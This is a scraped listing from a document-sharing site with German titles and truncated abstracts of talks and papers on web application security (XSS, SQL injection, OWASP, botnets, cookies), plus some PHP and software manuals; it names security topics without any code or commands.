Carsten Eilers ceilers-it.de Schwachstellen-Scans im Web 2.0 Vorstellung» Berater für IT-Sicherheit» Autor» About Security» Standpunkt Sicherheit» und anderes...» Schwachstellen-Datenbank» Security Aktuell
MehrAngreifbarkeit von Webapplikationen
Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre
MehrDatenschutztag. Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke
Datenschutztag Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke 1. Website Security Gliederung 2. Viren, Trojaner & Antivirensoftware 3. Phishing & Gefahren des World Wide
MehrSicherheit Web basierter Anwendungen
Sicherheit Web basierter Anwendungen IT Sicherheit Dozent: Prof. Dr. Stefan Karsch Enriko Podehl 13.02.2008 Einleitung it Web basierte basierte Anwendungen Teil unseres Alltags Geben dabei persönliche
MehrEntwicklung einer Webseite zur Verwaltung von Prüfungsterminen
Staatliche Fachschule für Mechatronik- und Elektrotechnik Entwicklung einer Webseite zur Verwaltung von Prüfungsterminen von Voit Alexander 3. Januar 2018 Entwicklungsarbeit Staatliche Fachschule für Mechatronik-
MehrGoogle Gears Offline Web?
Google Gears ist eine Browsererweiterung, die es in sich hat. Dem Webanwendungsentwickler werden Dienste bereitgestellt, die es ermöglichen, Webanwendungen so zu schreiben, dass eine Offline-Arbeit möglich
MehrSchwachstellenanalyse 2012
Schwachstellenanalyse 2012 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 13.01.2012 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten
Mehrdatenlink-schnittstelle Version 1.0
www.datenlink.info datenlink-schnittstelle Version 1.0 Inhalt 1 Allgemeines 2 1.1 Datenaustausch... 2 1.2 Zugriffstypen... 2 2 Format der Rückgabewerte 3 2.1 HTTP-Statuscodes... 3 2.2 Rückgabewerte...
MehrSchutz von Datenbanken vor fehlerhaften Webanwendungen
Schutz von Datenbanken vor fehlerhaften Webanwendungen Agenda 1. Problemstellung 2. Appliance zum Schutz von Webanwendungen 3. Prototyp 4. Ausblick Benjamin Große 2 Agenda 1. Problemstellung 2. Appliance
MehrRIPS. Automatisierte Schwachstellenerkennung in PHP-Software mittels statischer Quellcode-Analyse. BSI - 12. Deutscher IT-Sicherheitskongress
BSI - 12. Deutscher IT-Sicherheitskongress 10.-12. Mai.2011, Bonn Automatisierte Schwachstellenerkennung in PHP-Software mittels statischer Quellcode-Analyse, Ruhr-Universität Bochum 1 1.1 Motivation Schwachstellen
MehrPHP und MySQL. Integration von MySQL in PHP. Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424. Michael Kluge (michael.kluge@tu-dresden.
Zentrum für Informationsdienste und Hochleistungsrechnen (ZIH) PHP und MySQL Integration von MySQL in PHP Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424 (michael.kluge@tu-dresden.de) MySQL
Mehrphp Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...
php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...7 3.Zugriff auf mysql Daten...11 Verteilte Systeme: php.sxw Prof.
MehrXSS for fun and profit
5. Chemnitzer Linux-Tag 1.-2.- März 2003 XSS for fun and profit Theorie und Praxis von Cross Site Scripting (XSS) Sicherheitslücken, Diebstahl von Cookies, Ausführen von Scripten auf fremden Webservern,
MehrAbsicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10
The OWASP Foundation http://www.owasp.org Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 Tobias Glemser tobias.glemser@owasp.org tglemser@tele-consulting.com Ralf Reinhardt
MehrHacker-Tool Browser von der Webanwendung zu den Kronjuwelen
Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen Ralf Reinhardt 28.11.2013, 16:40 Uhr Roadshow Sicheres Internet aiti-park Werner-von-Siemens-Str. 6 86159 Augsburg 1 Hacker-Tool Browser Über
MehrWeb-Security. IT-Security. Andreas Unterweger. Studiengang Web Business & Technology FH Kufstein. Sommersemester 2017
Web-Security IT-Security Andreas Unterweger Studiengang Web Business & Technology FH Kufstein Sommersemester 2017 Andreas Unterweger (FH Kufstein) Web-Security Sommersemester 2017 1 / 24 Überblick Web-Security
Mehri-net HelpDesk Erste Schritte
1 Erste Schritte... 2 1.1 Wie geht es nach dem i-net HelpDesk Setup weiter?... 2 1.2 Desktop- oder Web-Client?... 2 1.3 Starten des Programms... 2 1.4 Anmelden (Einloggen) ist zwingend notwendig... 3 1.5
MehrOPTIGEM.Web. Technische Hinweise Version 18
OPTIGEM.Web Technische Hinweise Version 18 Zielgruppe dieses Dokuments sind Systemadministratoren. Bei den Ausführungen wird entsprechendes Fachwissen vorausgesetzt. Stand: 21.09.2018 1 EINLEITUNG... 3
MehrAktuelle Bedrohungen im Internet
Aktuelle Bedrohungen im Internet Max Klaus, MELANI Bedrohungen von Webanwendungen Reto Inversini, BIT Botnetze webreaders.de/wp-content/uploads/2008/01/botnetz.jpg ISB / NDB Melde- und Analysestelle Informationssicherung
MehrGefahr durch Cookies. Antonio Kulhanek. Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.
Gefahr durch Cookies Antonio Kulhanek Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.ch Rechtliche Hinweise Art. 143 StGB Unbefugte Datenbeschaffung
MehrSchnellinstallationsanleitung Timemaster WEB
Schnellinstallationsanleitung WEB Schematische Darstellung zur Funktionsweise von WEB: Hinweis: Bitte stellen Sie sicher, dass die nachfolgenden Installationsschritte alle vom gleichen Benutzer ausgeführt
MehrAblauf Unit2. Walkthrough
Ablauf Unit2 Vertiefendes Uebungsprojekt - SQL II Gerhard Wohlgenannt Test Vorstellung der Arbeitsumgebung (Software, Locations) Walkthrough Gruppeneinteilung + Themenvergabe Vorstellung der Arbeitsumgebung
MehrVerteidigungsmaßnahmen gegen SQL Injection
16. Cyber-Sicherheits-Tag, 21. Februar 2017, Hamburg Verteidigungsmaßnahmen gegen SQL Injection CAITA Sachverständigenbüro für IT Infrastruktur und IT Security, Lüneburg Master IT Architect, CISSP und
MehrBotnetz DoS & DDoS. Botnetze und DDoS. Ioannis Chalkias, Thomas Emeder, Adem Pokvic
Ioannis Chalkias Thomas Emeder Adem Pokvic Gliederung 1 Botnetz Aufbau eines Botnetzes I Der Bot Der Bot-Master Funktionsweise Zweck eines Botnetze I Zweck eines Botnetze II Arten I Arten II Botnetz Beispiele
MehrIT-Sicherheit. Sicherheit von Webanwendungen 10. Dezember 2010
IT-Sicherheit Sicherheit von Webanwendungen 10. Dezember 2010 Prof. Dr. Matthew Smith Hergen Harnisch smith@rrzn.uni-hannover.de harnisch@rrzn.uni-hannover.de M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10.
MehrRechtliche Hinweise Art. 143 StGB Unbefugte Datenbeschaffung Art. 143bis StGB Unbefugtes Eindringen in ein Datenverarbeitungssystem
Rechtliche Hinweise Art. 143 StGB Unbefugte Datenbeschaffung Wer in der Absicht, sich oder einen andern unrechtmässig zu bereichern, sich oder einem andern elektronisch oder in vergleichbarer Weise gespeicherte
MehrSoftwaresicherheit. Sicherheitsschwachstellen im größeren Kontext. Ulrich Bayer
Softwaresicherheit Sicherheitsschwachstellen im größeren Kontext Ulrich Bayer Conect Informunity, 30.1.2013 2 Begriffe - Softwaresicherheit Agenda 1. Einführung Softwaresicherheit 1. Begrifflichkeiten
Mehr